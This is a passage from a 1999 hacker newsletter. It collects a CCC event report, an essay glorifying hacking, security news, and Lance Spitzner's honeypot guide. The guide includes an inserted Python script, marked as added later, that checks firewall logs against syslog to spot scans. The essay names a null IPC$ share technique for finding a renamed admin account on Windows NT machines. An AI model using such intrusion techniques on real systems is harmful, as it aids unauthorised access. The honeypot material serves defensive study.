The sound was so bad, you couldn't hear it from 10 feet away." Besides hiring a security company with expertise in handling tech events (and decorating them), CCC organizers can also rely on the German flair for organization. More than 300 volunteers have already assembled outside East Berlin and laid down three kilometers of fiber optic cable and 14 kilometers of power cable, among other things. Every aspect of the weekend has been planned diligently. The goal is to provide more than a "hacker holiday," as Muller-Maguhn put it. He aims to encourage some deep thinking about technology and where it's going -- and not just from the kind of people who are light-years ahead of the rest of us. In fact, the first of the 27 workshops is intended to help general-interest participants get a handle on things. It will be called "How to ask for help on the Net," and will be led by CCC member Ron Fulda. "We will not be able to benefit from technology if people feel overrun by it, if people feel handled by machines, rather than feeling that they can handle them," said Muller-Maguhn. "There are a lot of people 35 or 40 who are unemployed because they were replaced in their job by a fucking machine. They just don't understand it." The nod to the less sophisticated is probably a good idea. As much as people in Berlin and elsewhere in Germany might respect the CCC for some of its high-profile exploits -- like hacking into NASA's computer in the mid-'80s -- some worry that they are losing touch with mainstream computer users. "The Chaos Computer Club has done some very interesting things," said Herbert Thaten, whose Netz-Werk cybercafe in East Berlin does a booming business. "They stand for finding holes in the computer systems of big companies. But I went to one of their workshops last year, and it was only for specialists. No one there could understand what the speaker was talking about." 
The complete list of workshops was due to be posted shortly at the CCC Web site, but another example of the more accessible workshops is "Creating Politics of Crypto Software," led by American hacker Lucky Green.

More than half the workshops are in English, and all will be freewheeling affairs, if organizers have their way.

"We have a very qualified audience in an informal setting," said another CCC spokesman, Frank Rieger. "If someone is standing up there telling bullshit, he will only be doing it about one minute and then someone will correct him."

It's easy to take Rieger at his word, sitting with him in the CCC offices in East Berlin, near Humboldt University, not far from Bertolt-Brecht-Platz. One large white wall is devoid of notable decoration, except for a black-and-white poster of Mahatma Gandhi kneeling and reading -- with an Apple logo in one corner.

High on an adjacent wall, next to a painting of Christ -- so the tone of ironic worship is not lost -- is a liberated façade from a Geldautomat, a German ATM machine.

The hacker movement in Germany is so high profile it has established itself almost as a branch of government. And it wrestles openly with the question of how to respond to technology.

Stefan Wernery, one of the two founding fathers of the CCC, devotes much of his time these days to lock-picking on good, old-fashioned metal, à la Artemus Gordon -- just the sort of thing the least tech-conscious person can appreciate.

"It's sort of lock-picking as sporting event," said Rieger. "They are teaching people how unsecure locks are."

Even if they may lose touch with the masses at times, CCC members spend a lot of time thinking about how they connect with the general public.

"We can say it's important to give the normal people -- and also politicians and journalists -- an understanding of how the tools work," Muller-Maguhn said.
"In America, more people have email, yes, but technology is driven by big corporations that think about profit and things like customer profiling. "For us it's important to give all groups an understanding of how computers and networks work. Compared to the US, the European public has very critical discussions about technology. Maybe that's one reason why technology is not integrated so rapidly. "People are not as careless as in the United States. They ask, 'What if?' They think about 1984 and Big Brother. That's always on our minds, so we don't have computers that can be switched to fascist mode," Muller-Maguhn said. That might even translate into Europeans, always considered backward when it comes to new technologies, having a little something to show their American counterparts. "The American hacker community is organized very differently than ours," said Muller-Maguhn. "I find it strange. Some groups are very political. Some are very technical. I have the feeling there is a very little in common between them. I don't even think they like each other. "In Europe we try to be both. We consult with politicians on censoring and so forth, and of course we are in a way a public institution. We try to provide information, freedom, and transparency of technology." @HWA 27.0 Hackers... Those Who Would Be Gods ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Hex_Edit A very interesting perspective about why some people do what they do has been sent to us by a member of the the group "HackCanada". Hex_Edit asks whether it is for the knowledge, just to post graffiti, testing security, or some other reason that drives some members of the community. Hackers... Those Who Would Be Gods http://www.hackernews.com/orig/why.html Hackers... Those who would be gods Why do we hack? Is it to alter webpages and leave some type of cybergang inner-city graffiti? Is it to laugh in the face of over-paid, under-qualified sysadmins? 
Well for myself, and everyone I associate with, the answer to both of those would be no. So then, why do we do it? To seek knowledge? Perhaps... That is definitely an overused and somewhat groundless excuse. We seek knowledge and wisdom every waking moment. Every breath we inhale leases us another 3 seconds of learning. Yes breaching a network's security does without a doubt involve learning. Yet do we not, on occasion, breach systems using exactly the same method as we have used previously? So in that case, why do we do it? If you have broken one NT box by guessing the Administrators password, why would we do it again to a different NT machine? Have we not already learned how to use an IPC$ share to gain the name of the re-named Admin account? We already know how to glean hidden shares from the aforementioned null connection. What are we learning from repeating the task? Nothing. So why then? I suppose the first few times, is in the hope that you will run into a new challenge. And sometimes we do, but is it often enough to chalk it all up to the great quest for knowledge? I personally wonder if that is true. Maybe as much as we shudder to admit it, it all comes down to two reasons. One is simply because it is there, and because we can. The other is slightly more sinister... We are voyeurs. We want to know what interesting stuff is on the other side. Whether we are corporate voyeurs, or peeping toms rifling through some hapless 98 users hard-drive. Sir Edmond Hillary once said, when questioned as to why he wished to climb Everest, "Simply because it is there." Are we really that shallow? Do we do this all simply because we can? Is the great quest for knowledge nothing more than what we tell ourselves to appease our conscience? Yet on the other hand I feel that there must be more to it. Maybe we really do have a primal thirst for information that isn't readily available to us. Perhaps we have a hidden side, that no one ever sees. 
A side that nothing ever senses but our keyboards. A darker vampiric, hematophagous side that thirsts for the life giving hemoglobin of information. A part of us so powerful it has altered our very genetic state. Have we evolved past the majority of our peers? Have we become demi-gods of a brave new "virtual" world? If you could imagine for a second, that we were to carry the same abilities and powers into the real world. What would we see? You are having an annoying conversation with someone you dislike, in a heartbeat they vanish from sight. You could instantly alter every part of your appearance, as to be totally unrecognizable, or to appear to be someone else entirely. Any company or person you wished, with a wave of your hand, they would lose the ability to communicate with anyone else in the world. You could be a ghost, and ethereally pass through any locked door or alarm system. You could grab any piece of information you desired from that home or office, and pass back through it's locked doors, with out any trace. Would these abilities not elevate us above normal human status? Is coding not the act of creation on a God like scale? "I wrote a little telnet app yesterday." Would translate, "Well you know, it took me a couple of hours, but I built this nifty little machine that allows me to instantly teleport myself to anywhere in the world." If that is the translation for writing a telnet app, what would everyone think of the guys that wrote Half life? :) So then back to our lives in this virtual world. Are we Gods? No. To us there is only one true God. And that is the Internet herself. All of her protocols, and operating systems. All of her routers, switches, fiber, and servers. Every tiny part of her, that communicate so eloquently together, as to create a whole. A whole entire being, that we all reside within. This is our God. This is whom we choose to worship. So what are we then my Hacker brethren? We make up less than 1% of all who reside within. 
Are we priests? No, I would place that label on the sysadmins, and helpdesk jockeys who instruct the herd. Perhaps we are Demons? Do demons not belong to the darkside, to the anti-God? If the Internet is our God, who is our Devil? Is it possible to have a positive without a negative, a Yin without a Yang? We must have an anti-God, yet what? I am not sure I know the answer. Could it be all that seek to control her? All that seek to bend our God to their gluttonous financial and controlling gain? It sounds plausible, and don't we battle against these powers? Do we not war against the very idea of governments and corporations altering our brave new world? If we are warriors of our God, would that not make us Angels? Thousands of years from now, our descendants may read their bible and understand how we all fought gallantly against the forces of darkness to ensure they lived in a world free of tyranny and oppression. They would read how the few battled fearlessly against the many, how we couldn't fathom the far-reaching consequences of our actions. They would marvel at how many of us were captured and destroyed, with out even knowing why we had to fight. So maybe we really don't need to grasp at an ethereal "why". It may all be pre-ordained, maybe we are just meant to do what we do, and it will all be revealed further down the long treacherous road. Then again... It is possible we are all just vitamin E deficient, socially inept humans, with a burning desire to wreak havoc, and feel power and respect we aren't afforded in our daily lives. Perhaps it is none of these things, yet that isn't for me to decide. I personally like the idea of throwing down my gauntlet, and standing as an avenging angel beside my God. Ready to war against all that would seek to harm her. Hex_Edit 08/04/99 Note: No email was provided so no permission was sought to reprint this article from HNN normally we contact the authors. 
- Ed

@HWA

28.0 European Crypto Mailing List
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by LouisC
A new mailing list for the discussion of cryptography issues in the European Union has been started. You can subscribe by sending email to majordomo@fitug.de that contains the words "subscribe eucrypto"

JYA.com
http://jya.com/eucrypto.htm

29.0 "Ya Wanna Be Hackers, Code Crackers, or just AOL Chat Room Yackers?"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Dr. Mudge
Weird Al's latest video "Its All About the Pentiums" from his latest album "Running With Scissors" should be available online today at 3:30 PM (EST). It will first be debuted on MTV's Total Request Live. "Your waxing Your Modem to Make it Go Faster", "Your about as useless as jpegs to Helen Keller", "You say your C=64 is really neato? What kind of chip you got in there a Dorito?" This album rocks.

Running With Scissors - via Amazon.com
http://www.amazon.com/exec/obidos/ASIN/B00000JH89/thehackernewsnet

Weird Al Yankovic
http://www.weirdal.com

Its All About the Pentiums
http://www.thepentiums.com

Note; if you haven't heard this song or don't like Weird Al for some reason you HAVE to listen to it, its totally hilarious ... - Ed

@HWA

30.0 WHO DO YOU WANT TO BE TODAY?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

by Thejian, Thursday 5th August 1999 on 8:20 pm CET
Novell has released Digitalme, a software product that is said to allow Internet users to control their own online identity and make it easier, and safer, to respond to online user surveys. Once information is asked by a Web site, Digitalme steps in and provides only the facts about you you want others to know, making you as anonymous as you want to be. Full story below.
http://www2.idg.com.au/cwt1997.nsf/8525601d005a204e85255fdc007c1fce/ddddc180892f6fa24a2567c20021527b?OpenDocument

SYDNEY - Novell has released software it says allows Internet users to control their own online identity.

Digitalme is designed to make it easier, and safer, to respond to the user surveys often required to enter a Web site, Novell officials said.

"Everyone needs to be able to manage their identity on the Internet but in the past you've had to let others do it for you and you had no control over what they did with your information," said Novell's director of technology and education services, Glen Jobson.

Digitalme takes the company's Novell Directory Services (NDS) to the Internet.

Users of the Novell's NetWare networking operating system are already familiar with the concept of an enterprise-wide directory that securely stores information about almost anything.

Increasingly, users of Windows NT are becoming aware of directory services through the anticipation being generated by Microsoft around Active Directory. And quite a number of NT users have also discovered NDS since it recently went cross-platform.

The digitalme push is set to take NDS right onto the public agenda and into the hearts and minds of everyone who has ever had to log in to anything on the Internet.

The concept is simple enough. You tell someone you trust, maybe your bank, perhaps your ISP, everything that anyone on the Net would ever be likely to ask. When a site asks you to provide that information, there's no need to start typing. The digitalme agent steps up to the screen and completes it for you.

Furthermore, the data communicated between digitalme and the Web site is encrypted and subject to an audit trail.

Digitalme won't fill in any more information than you've told it you're happy to provide. If the site wants more information, digitalme will tell you what else is requested and seek your approval before handing out your particulars.
You can even instruct digitalme to render an anonymous version of yourself to the Web site.

The digitalme information is stored in an online vault, so users are no longer stumped when they use a foreign PC, to visit a favourite site.

The first vault is being set up by Novell itself at a new site, www.digitalme.com.

"We're putting everything on the site that you need, as an end user or a developer," Jobson said. You can get the client there, you can store your details in our vault, and you can download the source code and APIs so that you can build your own digitalme clients.

Why would someone build their own clients? The whole Internet isn't going to want Novell to be the keeper of their personal data. We expect banks, online shops, finance advisers and Internet service providers, will want to manage their own vaults and encourage you to keep your details with them.

Why would you trust them? "This software only allows them to store your details securely. It doesn't allow them to read what's inside. Only you, the owner, can see what's inside, and only you can authorise the information to be released to third parties," Jobson said.

(c) Copyright 1999 ComputerWorld. All rights reserved.

@HWA

31.0 NAI GROUPSHIELD FOR EXCHANGE BUG
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/

by Thejian, Thursday 5th August 1999 on 4:20 am CET
This is a known but unannounced bug in Network Associates Inc's Groupshield for Exchange AV-software, causing mail messages to disappear without warning or trace. The problem is known to NAI and they're said to be investigating the problem. Full story below.

http://www.infoworld.com/cgi-bin/displayStory.pl?99084.ennai.htm

NAI Groupshield for Exchange bug causes message loss
By Ed Foster
InfoWorld Electric
Posted at 2:31 PM PT, Aug 4, 1999

A known but unannounced bug in Network Associates Inc.'s (NAI's) Groupshield for Exchange anti-virus product can cause messages from Exchange connectors to disappear.
Users who have suffered from the bug report losing thousands of mail messages without warning or trace. Messages being scanned for viruses by Groupshield as they come through mail connectors are inadvertently dropped before reaching the Exchange server, according to the users. After describing the problem to NAI support engineers, users were told it is a known problem, but the company's only recommendation was that they disable virus scanning of all external mail connectors including those for the Internet mail, MS Mail, and cc:Mail. "When we called NAI, they knew of the problem," reported one frustrated user. "Their recommendation is to exclude any connectors from scanning, such as Internet or MS Mail. There is no indication anywhere of any problems in release notes or their [Web] site, even now. Even worse, they knew that the bug lost data." NAI officials contacted by InfoWorld said they could not confirm the existence of the bug, but are investigating it. They also acknowledged that earlier versions of the product -- before Groupshield for Exchange 4.03, released last month -- had a "message-locking feature" which under certain circumstances could inadvertently lock virus-free messages and prevent them from reaching the server. Such messages, however, can be recovered by the Groupshield administrator, they said, adding that they were unaware of circumstances in which messages would be permanently erased. Users insisted, however, that messages are completely erased and that NAI support has confirmed that fact. "It's not message locking; it's message disappearing," said another user who has repeatedly reproduced the problem using Groupshield with an MS Mail connector for Exchange. "We'd turn off their virus protection and the messages would all flow through. Turn it back on and the messages all vanish. Try it on another machine, and the same thing happens." Network Associates Inc., in Santa Clara, Calif., is at www.nai.com. 
@HWA

32.0 How the blackhats work
~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/

TO BUILD A HONEYPOT
by Thejian, Thursday 5th August 1999 on 3:50 am CET
Many people asked Lance Spitzner how he was able to track black-hats in the act of probing for and compromising a system. Now he wrote a paper discussing just that. It discusses how to build, implement and monitor a honeypot network designed specifically to learn how black-hats work. Read the paper.

http://www.enteract.com/~lspitz/honeypot.html - (Check here for other papers written by Lance - Ed)

Lance Spitzner
Last Modified: 4 August, 1999

This article is a follow up to the "Know Your Enemy" series. Many people from the Internet community asked me how I was able to track black-hats in the act of probing for and compromising a system. This paper discusses just that. Here I describe how I built, implemented, and monitored a honeypot network designed specifically to learn how black-hats work.

What is a Honeypot?

For me, a honeypot is a system designed to teach how black-hats probe for and exploit a system. By learning their tools and methods, you can then better protect your network and systems. I do not use honeypots to capture the bad guy. I want to learn how they work without them knowing they are being watched. For me, a well designed honeypot means the black-hat never knew he was being tracked. There are a variety of different approaches on how you can do this. Mine is only one of many.

Before I continue, I would like to post a disclaimer. No honeypot can catch/capture all the bad guys out there. There are too many ways to spoof/hide your actions. Instead of going into detail on how this is possible, I highly recommend you check out Insertion, Evasion, and Denial of Service: Eluding Network Intrusion Detection or Bane software, . Also, throughout this paper I use the term black-hat. To me, a black-hat is anyone who is attempting un-authorized access to a system.
This could be a 15 year old kid from Seattle, or a 45 year old company employee in accounting. Throughout this paper our black-hat is referred to as he, however we have no idea what the true gender of the black-hat is.

Where to Begin?

There are a variety of different approaches to building a honeypot. Mine was based on simplicity. Build a standard box that I wanted to learn how the black-hat community was compromising. In this case it was Linux, but you can just as easily use Solaris, NT, or any other operating system. Don't do anything special to this system, build it as you would any other. Then put the system on the Internet and wait. Sooner or later someone will find the system and attack it. The system is built to be attacked and compromised, someone will gain root on that system, that is the goal. However, while they are gaining root (or Admin), you are tracking their every move.

This approach is different from other concepts. Network Associates has built a commercial product called CyberCop Sting. Designed to run on NT, this product can emulate a variety of different systems at the same time, including Linux, Solaris, Cisco IOS, and NT. Fred Cohen has developed the deception toolkit, which are a variety of tools intended to make it appear to attackers as if a system has a large number of widely known vulnerabilities. One of my favorites is NFR's BackOfficer Friendly, which emulates a Back Orifice server. All of these have their advantages. However, my goal was to build a honeypot that mirrored my production systems, so I could better understand what vulnerabilities and threats existed for my production network. Also, the fewer modifications I make to the honeypot, the less chance the black-hat will find something "fishy" on the box. I do not want the black-hat to ever learn that he was on a honeypot.

The Plan

My plan was simple. Build a box I wanted to learn about, put it on the network, and then wait. However, there were several problems to this.
First, how do I track the black-hat's moves? Second, how do I alert myself when the system is probed or compromised? Last, how do I stop the black-hat from compromising other systems? The solution to this was simple, put the honeypot on its own network behind a firewall. This solves a variety of problems.

- First, most firewalls log all traffic going through it. This becomes the first layer of tracking the black-hat's moves. By reviewing the firewall logs, we can begin to determine how black-hats probe our honeypot and what they are looking for.

- Second, most firewalls have some alerting capability. You can build simple alerts whenever someone probes your network. Since no one should be connecting to your honeypot, any packets sent to it are most likely black-hats probing the system. If there is any traffic coming FROM the honeypot out to the Internet, then the honeypot was most likely compromised. For an example on how to set up alerting with Check Point FireWall-1, click here.

- Third, the firewall can control what traffic comes in and what traffic goes out. In this case, the firewall lets everything from the Internet in, but only limited traffic out. This way the black-hats can find, probe, and exploit our honeypot, but they cannot compromise other systems.

The goal is to have our honeypot behind a controlled system. Most firewalls will do, as long as it can both control and log traffic going through it.

Tracking Their Moves

Now, the real trick becomes how to track their moves without them knowing it. First, you do not want to depend on a single source of information. Something can go wrong, things can be erased, etc. I prefer to track in layers. That way, if something does go wrong, you have additional sources of information. Also, you can compare different sources to paint a better picture.

Personally, I do not like to log information on the honeypot itself. There are two reasons for this. First, the fewer modifications you make to the honeypot, the better.
The more changes you make, the better the chance a black-hat will discover something is up. The second reason is you can easily lose the information. Don't forget, sooner or later the black-hat will have root on the honeypot. Several times I have had data altered, or in one case, the entire hard drive wiped clean. Our goal is to track the enemy's moves, but log all the data on a system they cannot access.

As we discussed above, our first layer of tracking is the firewall logs. Besides this, I track the black-hat's moves several other ways.

A second layer I use is the system logs on the honeypot. System logs provide valuable data, as they tell us what the kernel and user processes are doing. However, the first thing a black-hat normally does is wipe the system logs and replace syslogd. So, the challenge becomes logging syslog activity to another server, but without the black-hat knowing it. I do this by first building a dedicated syslog server, normally on a different network separated by the firewall. Then I recompile syslogd on the honeypot to read a different configuration file, such as /var/tmp/.conf. This way the black-hat does not realize where the real configuration file is. This is simply done by changing the entry "/etc/syslog.conf" in the source code to whatever file you want. We then set up our new configuration file to log both locally and to the remote log server (example). Make sure you maintain a standard copy of the configuration file, /etc/syslog.conf, which points to all local logging. Even though this configuration file is now useless, this will throw off the black-hat from realizing the true destination of our remote logging. Now, you will capture all system logs up to and including when the system is compromised. This will help tell us how the system was probed and compromised. It is also very interesting comparing these true system logs to the logs a black-hat has "cleaned" on a compromised system.
This is the only time where I make a modification on the honeypot.

The only problem with using a remote syslog server is it can be detected with a sniffer. Normally, black-hats either kill or replace syslogd when they gain root. If so, they can no longer sniff the syslog packets, since there are no longer any packets sent. However, if the black-hat does not modify nor kill the syslogd daemon, then they could sniff the packets sent. For the truly devious, you could send your syslogd traffic using a different protocol, such as IPX, which is normally not sniffed. Your level of paranoia may vary.

There are also several alternatives you can use to standard syslogd. CORE-SDI has ssyslog, which implements a cryptographic protocol called PEO-1 that allows the remote auditing of system logs. For you NT users, they also have a Windows version, called slogger. There is also syslog-ng, developed by BalaBit Software, which is similar in use to ssyslog, but uses SHA1 instead. All versions are free and open source.

My third layer of tracking (the firewall is the first, syslogd hack is the second) is to use a sniffer. I run a sniffer on the firewall that sniffs any traffic going to or from the honeypot. Since the honeypot is isolated by the firewall, you know all traffic has to go through the firewall. The advantage of a sniffer is it picks up all keystrokes and screen captures, to include STDIN, STDOUT, and STDERR. This way you see exactly what the black-hat is seeing. Also, all the information is stored on the firewall, safely protected from the black-hat (I hope :). A disadvantage is the black-hat can hide his moves with encryption, such as ssh. However, if you are not running any such services on your honeypot, the blackhat may not use them. Also, a sniffer can be spoofed by advanced users, as discussed by the paper linked above.

I've had great success using sniffit, a commonly used black-hat tool used to sniff passwords.
It does this by sniffing the first 300 bytes of every packet. By configuring sniffit to capture the full payload of every packet, you can capture all the keystrokes in most sessions (example). Another excellent sniffer you may want to consider is snort, which has additional IDS capabilities.

Finally, I run tripwire on the honeypot (there is also an NT version). Tripwire tells us what binaries have been altered on a compromised system (such as a new account added to /etc/passwd or a trojaned binary). I do this by running tripwire from a floppy, then storing the tripwire database to a floppy. You do NOT want any tripwire information stored locally on the system. By storing it on removable media, you can guarantee the integrity of the data. As an added precaution, I recommend compiling tripwire as statically linked. This way you are not using libraries that may be compromised on the honeypot. For the truly paranoid, boot off a floppy (such as tomsrtbt), then run tripwire. This protects against trojaned kernel modules. Tripwire is an excellent way to determine if your system has been compromised. Also, it is an excellent forensic tool that helps identify what modifications the black-hat has made.

You may find these layers redundant. But remember, no single layer of information can capture all the traffic. Also, different sources give you different information. For example, most systems cannot detect stealth scans, however, many firewalls can. If your firewall logs your honeypot being scanned, but there is nothing in the system logs, then you were most likely scanned by a "stealth" scanner, such as nmap. Also, we are not perfect. Often while tweaking one service, you munge another. You could accidentally kill system logging or the sniffer. By having other layers of information, you still can put a picture together of what happened. If you develop any of your own methods of tracking, I highly recommend you implement them.
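The firewall-versus-system-log comparison described above can be run as a routine check. The following is an added example, not code from the original article: it lists each source the firewall saw contacting the honeypot and flags those that touched several ports without leaving any trace in the honeypot's own logs. The firewall log format, the addresses and the three-port threshold are assumptions made for the example.

```python
"""Cross-check firewall logs against honeypot syslog, layer against layer.

Added example: both log formats, all addresses and the threshold are constructed.
"""
import re
from collections import defaultdict

HONEYPOT_IP = "10.1.1.5"  # assumed address of the honeypot

# Hypothetical firewall log format: "... ACCEPT TCP src:sport -> dst:dport FLAGS"
FW_RE = re.compile(
    r"(?P<proto>TCP|UDP) (?P<src>(?:\d{1,3}\.){3}\d{1,3}):\d+ -> "
    r"(?P<dst>(?:\d{1,3}\.){3}\d{1,3}):(?P<dport>\d+)"
)
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

BOTH_LAYERS = "seen by firewall and system logs"
FIREWALL_ONLY = "seen by firewall only"
FIREWALL_ONLY_SCAN = "seen by firewall only, many ports: likely stealth scan"

# Constructed sample: firewall log (the last line is outbound traffic).
FIREWALL_LOG = """\
Aug  3 03:58:10 fw filter: ACCEPT TCP 198.51.100.9:40211 -> 10.1.1.5:21 SYN
Aug  3 03:58:10 fw filter: ACCEPT TCP 198.51.100.9:40212 -> 10.1.1.5:23 SYN
Aug  3 03:58:10 fw filter: ACCEPT TCP 198.51.100.9:40213 -> 10.1.1.5:25 SYN
Aug  3 03:58:11 fw filter: ACCEPT TCP 198.51.100.9:40214 -> 10.1.1.5:111 SYN
Aug  3 04:10:51 fw filter: ACCEPT TCP 192.0.2.77:1033 -> 10.1.1.5:23 SYN
Aug  3 04:20:00 fw filter: ACCEPT UDP 203.0.113.4:5353 -> 10.1.1.5:53
Aug  3 04:21:00 fw filter: ACCEPT UDP 10.1.1.5:1040 -> 203.0.113.4:53
""".splitlines()

# Constructed sample: the honeypot's system log (trusted remote copy).
HONEYPOT_SYSLOG = """\
Aug  3 04:10:51 honeypot in.telnetd[412]: connect from 192.0.2.77
Aug  3 04:11:02 honeypot login[413]: FAILED LOGIN 1 FROM 192.0.2.77 FOR root
""".splitlines()


def ports_by_source(fw_lines, honeypot_ip):
    """Map each remote source to the set of honeypot ports it contacted."""
    seen = defaultdict(set)
    for line in fw_lines:
        m = FW_RE.search(line)
        if m and m["dst"] == honeypot_ip:  # inbound traffic only
            seen[m["src"]].add(int(m["dport"]))
    return seen


def sources_in_syslog(syslog_lines):
    """Every IPv4 address the honeypot itself wrote into its logs."""
    return {ip for line in syslog_lines for ip in IPV4_RE.findall(line)}


def classify(fw_lines, syslog_lines, honeypot_ip, scan_threshold=3):
    """Return {source: (verdict, sorted ports)} for every inbound source.

    A source the host never logged may simply have hit a closed port, so a
    firewall-only source is only called a likely scan once it has touched
    `scan_threshold` or more distinct ports (an assumed cut-off).
    """
    logged = sources_in_syslog(syslog_lines)
    verdicts = {}
    for src, ports in ports_by_source(fw_lines, honeypot_ip).items():
        if src in logged:
            verdict = BOTH_LAYERS
        elif len(ports) >= scan_threshold:
            verdict = FIREWALL_ONLY_SCAN
        else:
            verdict = FIREWALL_ONLY
        verdicts[src] = (verdict, sorted(ports))
    return verdicts


if __name__ == "__main__":
    for src, (verdict, ports) in classify(
        FIREWALL_LOG, HONEYPOT_SYSLOG, HONEYPOT_IP
    ).items():
        print(f"{src:15} ports={ports} -> {verdict}")
```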
The more layers you have, the better off you are. If you have any methods you would like to recommend, I would love to hear from you. Additional methods can include hacking the system shell or kernel to log keystrokes, but to be dead honest, I haven't developed the skills yet to do that.

The Sting

Remember, our goal is to learn about the black-hat, without him ever knowing he was had. To gain a better understanding of this strategy, I highly recommend you watch one of my favorite movies, The Sting. We want to attract the black-hats, monitor them, let them gain root, and then eventually kick them off the system, all without them getting suspicious. To attract black-hats, I like to name my honeypot enticing names, such as ns1.example.com (name server), mail.example.com (mail server), or intranet.example.com (internal web server). These are often primary targets for black-hats. Once we have enticed them, use the methods discussed above to track their actions.

Once the black-hat gains root, the question becomes, now what? Normally, I continue to monitor the black-hat for several days, to learn what he is up to. However, you have to be careful, eventually the black-hat will catch on that he is on a honeypot. If he does, bad things can happen. What I like to do is once I learn everything I can, I kick the black-hat off, normally by rebooting the box. I do this with the shutdown command, sending a message to all logged on users (the black-hat), stating the system is going down for routine maintenance. I then take the system off-line, remove the backdoors the black-hat made, and bring the system back online. Or, you can reinstall, building a new system. I recommend you fix the vulnerability that was used to gain access last time, so you can learn about new exploits/vulnerabilities.

The other issue is limiting the black-hat, we do not want him launching attacks from our own system. I do this by using the firewall.
Remember, all traffic to and from the honeypot must go through the firewall. I use a rulebase that allows anything from the Internet to reach our firewall, but only limited traffic outbound (basically, the exact opposite of what a firewall is designed to do). The trick is, allowing enough outbound traffic so a black-hat does not get suspicious, but we still have to limit their capabilities. If you block everything outbound, the black-hat will know right away that something is up. If you allow everything outbound, the black-hat can blatantly scan the Internet from your system. You now become liable for his actions, so we have to find a balance. Normally the first thing a black-hat does following access is to download their tool set. If they can't reach the Internet, they are going to cover their tracks and leave your system. What has worked for me is to allow all traffic inbound, and allow FTP, ICMP, and DNS (UDP) outbound. Normally, this is enough for the black-hat without them getting suspicious right away, but denies them utilizing most of their tools outbound. Your mileage may vary.

That's it. All that is left is to wait for the black-hat to strike (kind of like fishing). Ensure you have a good alerting mechanism, so you know as soon as possible when your system is being probed or has been compromised. You want to get as much information as soon as possible. You do not want the black-hat to catch on before you know he is there, bad karma may be coming your way. Good luck!

Conclusion

Honeypots are an extremely powerful tool that allows you to learn about the black-hat community. Correctly implemented, they give you an inside window on how the black-hat community works. There are a variety of different approaches to building and implementing a honeypot, mine is only one of many. My goal is to build a simple system that mirrors the production network, then sit back and wait. The key to tracking the enemy is layers.
Do not depend on a single layer of information, as it can be altered or lost. By comparing different layers of information, you can also gain a better understanding of what the black-hat was doing. Happy hunting :)

Author's bio

Lance Spitzner enjoys learning by blowing up his Unix systems at home. Before this, he was an Officer in the Rapid Deployment Force, where he blew up things of a different nature. You can reach him at lance@spitzner.net .

@HWA

33.0 ADMINS ASLEEP ON WATCH?
     ~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/

by Thejian, Thursday 5th August 1999 on 3:40 am CET

"An Incident Note released by the CERT Coordination Center at Carnegie Mellon University suggests that crackers are using scripts to automatically probe for different vulnerabilities in rapid succession." Hence the term "script kiddie". Seems this reporter is figuring out the fact that most servers get "hacked" by utilizing known holes. ZDNet.

--------------------------------------------------------------
This story was printed from ZDNN, located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------

Security administrator: Heal thyself
By David Raikow, Sm@rt Reseller
August 4, 1999 6:25 AM PT
URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2308725,00.html

When it comes to security, system administrators like to think of themselves as defenders of the home-front, locked in an ongoing battle of wits with a horde of marauding invaders. But a recent round of attacks on UNIX servers suggests that, in reality, many administrators are asleep on watch.

In an Incident Note released July 22, the CERT Coordination Center at Carnegie Mellon University described a wave of "Similar Attacks Using Various RPC [Remote Procedure Call] Services." Evidence from targeted servers suggests that crackers are using scripts to automatically probe for different vulnerabilities in rapid succession.
Any one of these security holes could permit the cracker root-level access to the server, completely compromising its security and threatening any associated machines.

While these types of alerts usually address newly discovered vulnerabilities or cracking techniques, this report was disturbing precisely because there was nothing new about it. Each of the security holes attacked by the scripts is well known and documented. Each has been fixed by free patches available from vendors. But because many sysadmins are lax about updating their software, the attacks often succeed anyway. Indeed, the type of "shotgun" approach that this automated approach suggests is attractive only if crackers suspect that a substantial percentage of servers are vulnerable.

Security often takes a back seat to other priorities, as sysadmins focus on meeting the increasing demands placed on network systems, according to a CERT technician. Short term, immediate user needs tend to trump potential threats from unknown sources. "Security is an ongoing thing, and people don't always recognize the threat," says CERT Technical Coordinator Quinn Peyton, "Often good administrators are hampered because they lack the appropriate resources."

Cracks Are Costly

The costs of a root-level security breach can be devastating, however. According to CERT, compromised machines must be disconnected from the network, their drives wiped, and their OS software reinstalled from clean media. Any data restored from backups must be carefully scrutinized to prevent reintroduction of backdoors or viruses. Any and all sensitive information -- including passwords -- also has been compromised and must be changed. Finally all associated machines must also be scoured for any signs of intrusion.

CERT does point out one silver lining to this cloud. "Once people are compromised, they tend to be much more diligent," notes Peyton. "Nobody wants to go through that twice."
@HWA

34.0 THEFT HURTS THE WELL
     ~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/

by Thejian, Wednesday 4th August 1999 on 1:30 am CET

A computer containing customer credit card numbers has been stolen from GST Whole Earth Networks' San Francisco office. Among those vulnerable to credit card fraud are some longstanding members of online community The WELL, although no fraudulent use has been reported yet or is much expected since the data was encrypted. Wired.

http://www.wired.com/news/news/technology/story/21076.html

Computer Theft Hurts The WELL
by Chris Gaither
12:30 p.m. 3.Aug.99.PDT

A computer loaded with customer credit card numbers has been swiped from GST Whole Earth Networks' San Francisco office.

Among those vulnerable to credit card fraud are some longstanding members of The WELL, one of the Internet's first online communities. The WELL has no ISP of its own, and many members were grandfathered in to Whole Earth's WeNet service through a series of takeovers.

No fraudulent use of the cards has been reported. The information was encrypted, according to GST.

"That's great," Gail Ann Williams, executive director of The WELL, said of the encryption. "That's the ultimate defense we all dream of."

About 2,700 of The WELL's 7,000 customers use the WeNet ISP, according to Andrew Ross, vice president of marketing for Salon.com, The WELL's parent company.

GST Telecommunications, WeNet's parent company, would not comment or answer questions about the theft Tuesday, saying they were too busy preparing an annual earnings announcement. However, on Monday the company issued a release saying that credit card companies were immediately notified of the theft.

